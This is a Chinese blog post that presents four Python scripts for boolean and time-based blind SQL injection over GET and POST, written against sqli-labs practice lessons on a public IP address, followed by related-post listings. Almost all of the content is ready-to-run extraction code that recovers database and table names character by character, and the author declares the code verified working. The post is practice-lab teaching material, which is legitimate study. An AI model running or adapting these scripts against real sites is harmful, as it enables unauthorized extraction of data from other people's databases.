SQL 盲注GET /POST、布尔型,延时型Python脚本

最新推荐文章于 2023-09-30 12:05:12 发布
最新推荐文章于 2023-09-30 12:05:12 发布
阅读量4.1k 收藏 25
点赞数 6
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vhkjhwbs/article/details/98960802
版权

以下脚本都用 sql-labs 中的题目进行测试:

sql-labs 靶场:http://43.247.91.228:84/

 

一,sql注入之 GET传参 布尔型

import requests

result = ""
url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1},1))>{2} %23"
chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~"
url_length = "http://43.247.91.228:84/Less-8/?id=2' and length(({0})) >{1} %23"

def get_result_length(payload,value):
    for n in range(1,100):
        url = url_length.format(payload,n)
        response = requests.get(url)
        length = len(response.text)
        if length >value:
            print("……data length is :" + str(n))
            return  n

def get_db_name(data_length,payload,value):
    for i in range(1,data_length):
        for char in chars:
            url = url_template.format(payload,i,ord(char))
            response = requests.get(url)
            length = len(response.text)
            if length>value:         #根据返回长度的不同来判断字符正确与否
                global result
                result += char
                print("…… data is :"+ result)
                break

#自定义 sql注入语句 payload   分割符 为0
payload = "select group_concat(table_name) from information_schema.tables where table_schema=database() "
# 根据正确访问时错误访问时返回页面文本长度的不同 来设置一个判断值
value = 706
data_length = get_result_length(payload,value)+1
get_db_name(data_length,payload,value)
print(result)

二,sql注入之 GET 传参延时型

import requests
value ="0123456789abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!"
data=""

# 需要 不断 手工调整 url 和 url_length 中的 limit 的第一个参数 来获取下一行的数据
url = "http://43.247.91.228:84/Less-9/?id=1' and if((ascii(substr(({0} limit 1,1),{1},1)) = '{2}'),sleep(3),NULL); %23"
url_length="http://43.247.91.228:84/Less-9/?id=1' and if((length(({0} limit 1,1))={1} ),sleep(3),NULL); %23"
def get_length(payload):
    for n in range(1,100):
        url= url_length.format(payload,n)
        #print(url)
        if(get_respone(url)):
            print("[+] length is {0}".format(n))
            return n
def get_data(payload,value,length):
    for n in range(1,length):
        for v in value :
            url_data = url.format(payload,n,ord(v)) #ord()返回字符的ASCII码
            #print(url_data)
            if(get_respone(url_data)):
                global data
                data=data+v
                print("[+] data is {0}".format(data))
                break
def get_respone(url):
    try:
        html = requests.get(url,timeout=2)
        return False
    except Exception as e:
        print("......")
        return True
#可以更改payload 来获取需要的数据
databse_payload ="select database()"
get_data(databse_payload,value,get_length(databse_payload)+1)

三 sql注入之 POST 传参 延时型

import requests
import time
value ="0123456789abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!"
result=""

def get_length():#获取数据的长度
    for n in range(1, 100):
        payload = "admin' and if((length(({0} ))={1}),sleep(4),1) #".format(data_payload, n)
        data = {"uname": payload, "passwd": "admin", "submit": "submit"}
        start_time = time.time()
        html = requests.post(url, data=data)
        end_time = time.time()
        use_time = end_time - start_time #求出请求前后的时间差来判断是否延时了
        if use_time > 3:
            print("...... data's length is :"+ str(n))
            return n

def get_data(length):#获取数据
    global result
    for n in range(1,length):
        for v in value:
            payload = "admin' and if((ascii(substr(({0} ),{1},1)) = '{2}'),sleep(5),1) #".format(data_payload,n,ord(v))
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            start_time = time.time()
            requests.post(url,data=data)
            end_time = time.time()
            use_time = end_time - start_time
            # 为啥把sleep时间设这么长呢?原因是我这里时常会出现网络波动,有时候请求时间就有2秒多,为避免出现乱码,所以设长一点可以保证信息的准确性
            if use_time >4:
                result += v
                print("......"+result)



url = "http://43.247.91.228:84/Less-15/"

data_payload ="select group_concat(table_name,0x7e)from information_schema.tables where table_schema=database()"

length = get_length() + 1   #注意这里要长度加 1 因为 range(1,10)的范围是 1<= x <10
get_data(length)
print(".....data is :"+ result)

四 sql注入 之 POST 传参 布尔型

import requests

chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~"
result = ""

def get_length(value):  #获取要查询的数据的长度
    for n in range(1,100):
        payload = "admin' and length(({0})) ={1} #".format(data_payload,n)
        data = {"uname":payload,"passwd":"admin"}
        html = requests.post(url,data=data)
        length = len(html.text)
        if length >value:
            print("……data length is :" + str(n))
            return  n

def get_data(data_length,value): #获取数据
    global result
    for i in range(1,data_length):
        for char in chars:
            payload = "admin'and ascii(substr(({0}),{1},1))={2} #".format(data_payload,i,ord(char))
            data = {"uname":payload,"passwd":"admin"}
            html = requests.post(url,data=data)
            length = len(html.text)
            if length>value:         #根据返回长度的不同来判断字符正确与否
                result += char
                print("…… data is :"+ result)
                break


url = "http://43.247.91.228:84/Less-15/"
data_payload = "select group_concat(table_name)from information_schema.tables where table_schema = database()"
value = 1460     # 根据正确访问和错误访问时返回页面文本长度的不同 来设置一个判断值,这个值需要在浏览器中 按f12 查看

length = get_length(value) +1
get_data(length,value)
print(result)

 

(以上脚本经过验证没有任何问题)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Captain Hammer
关注
  • 6
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入攻击 - 利用sqlmap探测盲注
weixin_43263566的博客
01-31 284
准备:使用bp抓到靶场的http请求,然后复制保存到 request.txt。如果想用时间盲注就将参数 B 改成 T 就行。我将复制的请求内容文件存在到kali的桌面上。如果要用 布尔盲注就将c参数T 改成B。注意:因为是盲注所以运行时间会有点长。:指定使用时间延迟注入技术进行测试。
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
布尔盲注.py_sql盲注python_
10-03
一个简单的sql注入盲注python脚本,其中语句需要根据环境条件做改变
SQL盲注python脚本编写
nobugnomoney的博客
05-18 3296
1、什么是盲注 盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间SQL 盲注 基于报错的 SQL 盲注 0x01.基于布尔 SQL 盲注----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
【针对sqli-labs第9关的时间盲注python脚本
AA8j的博客
09-09 646
效果图 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/7 10:20 # @Author : AA8j # @Site : # @File : Time-based-blind-SQL-injection.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import binascii import request
Web安全攻防的学习——06—(盲注介绍、GET基于时间盲注、GET基于Boolean的盲注POST基于错误的注入、POST基于时间盲注SQL注入绕过手段)(重点)
weixin_42118531的博客
03-02 517
1、盲注介绍 Blind SQL(盲注)是注入攻击的其中一种,向数据库发生true或false这样的问题,并根据应用程 序返回的信息判断结果。这种攻击的出现是因为应用程序配置为只显示常规错误,但并没有解决SQL注入存在的代码问题 盲注种类 1.布尔 2.时间盲注 GET基于时间盲注 if(ascii(substr(database(),1,1))=115,1,sleep(3)) # ...
手工时间盲注python代码
m0_73767377的博客
04-09 171
【代码】手工时间盲注python代码,修改url和文件头后直接运行即可
使用python脚本时间盲注完整步骤
wutiangui的博客
09-30 456
测试环境是bwapp靶场 SQL Injection - Blind - Time-Based。tips:title=,&action=search需要使用burp抓包获得。我们发现使用这种方法似乎比burp更快更高效,只是从列爆破开始需要自己选表名。
python requests post 使用方法
JacobSun的博客
04-29 1万+
使用python模拟浏览器发送post请求 import requests 1.格式request.post: request.post(url, data, json, kwargs) # post请求格式 request.get(url, params, kwargs) # 对比get请求 2.发送post请求 传参分为: 表单(x-www-form-urlencoded) json(a...
SQL注入——POST注入和HEAD注入
weixin_46601374的博客
02-25 1580
POST注入如何注入 POST注入和普通注入一样,只是通过post提交数据,在提交的数据中进行注入。 post注入会出现在哪里 登录框,查询框等各种各样的框 万能密码原理 select username,password from users where username='admin' and password = ' 'or 1=1%23' limit 0,1(我们来看着语句逻辑,where后面是条件,username和password之间是and连接,所以两个有一个为否返回就是否,
Python编写盲注自动化脚本
qq_42990434的博客
05-14 1446
注入中盲注它要花费很多时间进行排除,所以作为小白的我也想尝试如何去编写简单的 python脚 本,来提高挖盲注的效率。 说到盲注的排除,我们第一时间就会想到二分法,因为不可能逐个逐个的用 “=” 去排除,这样浪费的时间会更多,所以脚本的编写我也是用二分法的,下面我会用自己盲注数据库名字的例子来说明一下: #!/usr/bin/env python # coding:utf-8 import requests import sys url = "http://xxx.xxx.xxx.xxx/xxx/xxx
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
用于sql延时盲注脚本,比较初级
最新发布
03-22
主要是通过使用Time.time()函数获取时间戳,然后对比发送请求后的时间戳,如果差距为延时设置的时间则表明符合条件,通过字典搜索该ASCII码对应的字符然后插入到输出的字符串中。 程序中使用时主要修改url,最终输出...
python编写的sql盲注
10-28
python编写的sql盲注
MSSQL SQLServer分布式集群Python自动故障转移脚本
06-15
【MSSQLSQLServer分布式集群Python自动故障转移脚本 #安装依赖 pip install pymssql #windows打包 pyinstaller -w -F mssqlScript.py ######or pyinstaller -F mssqlScript.py #windows运行 ./mssqlScript.exe ...
CTF——流量分析题整理总结
热门推荐
小锤队长的博客
12-19 4万+
我见过的流量分析类的题目总结: 一,ping 报文信息 (icmp协议) 二,上传/下载文件(蓝牙obex,http,难:文件的分段上传/下载) 三,sql注入攻击 四,访问特定的加密解密网站(md5,base64) 五,后台扫描+弱密码爆破+菜刀 六,usb流量分析 七,WiFi无线密码破解 八,根据一组流量包了解黑客的具体行为 例题: 一,ping 报文信息 (icm...
PHP+Mysql 实现用户登录,注册界面
小锤队长的博客
07-28 3万+
目标: 实现用户的登录 、注册 、修改密码、重置密码、添加书签,显示书签,删除书签 等功能 进一步目标: 实现对 用户输入信息的控制,具体表现在 对注册信息、登录信息的 的过滤,具有简单的防sql注入的功能 首先明确结构:把自定义的函数集中放在两个脚本 bm_functions.php 和 output_functions.php 中 完成后的各个界面: 登录界面: 注册界...
CTF——常见密码
小锤队长的博客
08-18 1万+
CTF题中遇到的密码总结: 序号 名称 密文 原文 备注 1 栅栏密码: fg2ivyo}l{2s3_o@aw__rcl@ flag{w22_is_v3ry_cool} 所谓栅栏密码,就是把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成一段无规律的话。 不过栅栏密码本...
CTF——Web——文件包含漏洞
小锤队长的博客
08-19 1万+
转载于 信安之路 :https://cloud.tencent.com/developer/article/1180857 文件包含原理: 原理 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当...
利用python写一个布尔sql盲注
05-01
布尔 SQL 盲注是一种基于布尔逻辑的盲注技术,它通过对 SQL 语句执行结果的布尔判断来推断出数据库中的信息。以下是一个利用 Python 实现布尔 SQL 盲注的示例代码: ```python import requests # 要注入的目标 URL url = 'http://example.com/index.php?id=1' # SQL 注入的语句 payload = "' or 1=1#" # 发送 GET 请求,注入 SQL 语句 response = requests.get(url + payload) # 判断 SQL 语句是否注入成功 if 'Error' in response.text: print('SQL 注入失败') exit() # 判断数据库中是否存在所查询的数据 if 'Welcome' in response.text: print('存在该数据') else: print('不存在该数据') ``` 在实现中,我们首先定义了要注入的目标 URL 和 SQL 语句。然后,我们通过 requests 库发送 GET 请求,将 SQL 语句注入到 URL 中。如果注入失败,则程序退出。如果注入成功,则判断响应结果中是否存在所查询的数据。如果存在,则输出“存在该数据”,否则输出“不存在该数据”。 需要注意的是,这只是一个示例代码,实际应用中需要根据目标网站的情况进行调整。同时,SQL 注入是一种违法行为,使用时需谨慎。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值